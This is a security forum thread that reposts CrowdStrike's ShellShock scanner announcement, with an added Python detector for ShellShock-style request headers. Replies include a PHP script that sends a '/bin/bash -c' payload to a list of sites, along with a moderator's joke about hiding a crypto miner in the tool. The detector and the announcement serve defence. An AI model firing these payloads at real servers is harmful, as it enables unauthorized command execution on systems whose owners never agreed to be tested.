Nytro

CrowdStrike ShellShock Scanner


CrowdStrike ShellShock Scanner – New Community Tool

The Tool Box 30 Sep 2014 Dmitri Alperovitch

A large number of ShellShock online vulnerability scanners have been released since the bug disclosure on September 24. These tools can be great for scanning external web servers, however, just as we’ve seen with the Heartbleed scanners, there is a real unfilled need for a tool that can be easily used to scan for vulnerable internal systems, in addition to the external servers. While Unix gurus can fairly easily write scripts to accomplish this task, many prefer to have an easy to use Windows GUI tool to simplify the vulnerability assessment process.

And so after once again having put Robin Keir, our toolbuilder extraordinaire, on the case, we are proud to announce CrowdStrike ShellShock Scanner as our latest free community tool. As with our Heartbleed scanner, the tool can import a list of IP ranges or website URLs to scan. Multiple port ranges can be selected and the results can be saved in CSV, HTML, XML or text format.


Unfortunately network-based scanning for vulnerable ShellShock servers is nowhere near as easy as identifying the Heartbleed servers since the triggering of execution of the bash shell is usually very specific to each application. Even to effectively scan HTTP servers, one needs to know the path to all of the CGI scripts that are dependent on bash and sometimes even the specific GET or POST parameters that need to be supplied to the script in order to trigger the vulnerability. We have preloaded the scanner with almost 400 common CGI paths that will be attempted during the full scan and have allowed the import of additional paths to test custom or less popular CGI applications.

The scanner works by sending an HTTP GET request to each pre-configured CGI path of the scanned target with the following headers:

Cookie: () { :; }; echo -e "\r\n\r\n<random string>"

Referer: () { :; }; echo -e "\r\n\r\n<random string>"

User-Agent: CrowdStrike ShellShock Scanner/1.0

Test: () { :; }; echo -e "\r\n\r\n<random string>"

When the CGI script launches bash with the supplied environment parameters, it should trigger the execution of the echo command on a vulnerable system. With most scripts, the random string in the output of the echo command will be sent back in the body of the HTTP response, allowing the scanner to detect it and deem the system vulnerable. We deliberately picked the innocuous echo command as the one to execute by the scanner so as to minimize the chance of the scan doing anything harmful to the vulnerable target.

Please note that even a full internal and external IP range scan of your network will not provide you with a complete assurance that you are not vulnerable to ShellShock.

In addition to the limitations of scanning CGI applications, this scanner is not able to determine the vulnerability of SMTP servers or DHCP clients to the bug. Nor is it able to be used to test for privilege escalation vulnerabilities via SSH or on local Unix and OSX systems. It is still paramount that you apply patches across your entire population of systems that utilize bash shell as soon as possible.

You can download CrowdStrike ShellShock Scanner here.

Source: CrowdStrike ShellShock Scanner – New Community Tool | Adversary Manifesto

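Seen from the receiving web server, the probe described in the article is recognisable by one trait: a header value that begins with a bash function definition. The Python below is an added example (not part of the article, the forum posts, or CrowdStrike's tool) that parses raw requests and flags such headers. The sample requests, host name, path and triage labels are constructed for illustration.

```python
import re

# A header value that begins with a bash function definition: "() { ...; }; <command>".
# Normal Cookie / Referer / User-Agent values never start this way.
FUNC_DEF = re.compile(r"^\(\)\s*\{[^}]*\}\s*;?\s*(?P<trailer>.*)$", re.S)

def parse_headers(raw):
    """Return [(name, value)] from a raw HTTP request (header block only)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers

def probe_headers(raw):
    """Return [(header_name, trailing_command)] for every header carrying the pattern."""
    hits = []
    for name, value in parse_headers(raw):
        m = FUNC_DEF.match(value)
        if m:
            hits.append((name, m.group("trailer")))
    return hits

def triage(raw):
    """Label a request: 'clean', 'echo-probe' (only echo follows), or 'other-command'.
    Assumed labels for this example; an echo-only probe still means the host is being tested."""
    hits = probe_headers(raw)
    if not hits:
        return "clean"
    if all(cmd.startswith("echo ") for _, cmd in hits):
        return "echo-probe"
    return "other-command"

def request(path, *headers):
    """Build a constructed sample request with real CRLF line endings."""
    return "\r\n".join([f"GET {path} HTTP/1.1", "Host: www.example.test", *headers]) + "\r\n\r\n"

# Constructed samples. The backslashes inside the echo argument are literal text,
# as they appear on the wire; "RANDOM123" stands in for the random string.
PROBE = r'() { :; }; echo -e "\r\n\r\nRANDOM123"'
SCANNER_STYLE = request("/cgi-bin/status", "Cookie: " + PROBE, "Referer: " + PROBE,
                        "User-Agent: CrowdStrike ShellShock Scanner/1.0", "Test: " + PROBE)
COMMAND_STYLE = request("/", 'User-Agent: () { :;}; /bin/bash -c "ls"')
BENIGN = request("/index.html", "User-Agent: Mozilla/5.0", "Cookie: session=abc123; theme=dark")

if __name__ == "__main__":
    for label, raw in (("scanner", SCANNER_STYLE), ("command", COMMAND_STYLE), ("benign", BENIGN)):
        print(label, triage(raw), [n for n, _ in probe_headers(raw)])
```

The same check works as a request filter in front of CGI handlers; match on the header value, not on the User-Agent name, since the latter is trivially changed.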

  • Moderators

This is for script kiddies. If I were the developer, I would also have put a bitcoin-mining script in the application, so that if the kids are downloading it anyway, I could at least make an honest buck.

It can be done faster like this from the console.


<?php
// Target URLs to check (placeholders).
$situri = array("http://site.ro/", "http://site2.ro");

foreach ($situri as $sit)
{
    if (scaneaza($sit))
        echo $sit . "\n";
}

// Returns 1 when the request fails and the status line contains "500", otherwise 0.
function scaneaza($url)
{
    $cmd = "ls";

    // Send the function-definition string in the User-Agent header.
    $context = stream_context_create(
        array(
            'http' => array(
                'method' => 'GET',
                'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
            )
        )
    );

    if (!file_get_contents($url, false, $context) && strpos($http_response_header[0], "500") > 0)
        return 1;
    else
        return 0;
}
?>


It can be done faster like this from the console.


<?php
$situri = array("http://site.ro/","http://site2.ro");

foreach($situri as $sit)
{
if(scaneaza($sit))
echo $sit . "\n";
}


function scaneaza($url)
{
$cmd = "ls";

$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
return 1;
else
return 0;
}
?>

You dropped about 2 ))

at $context = ))); at the end :))
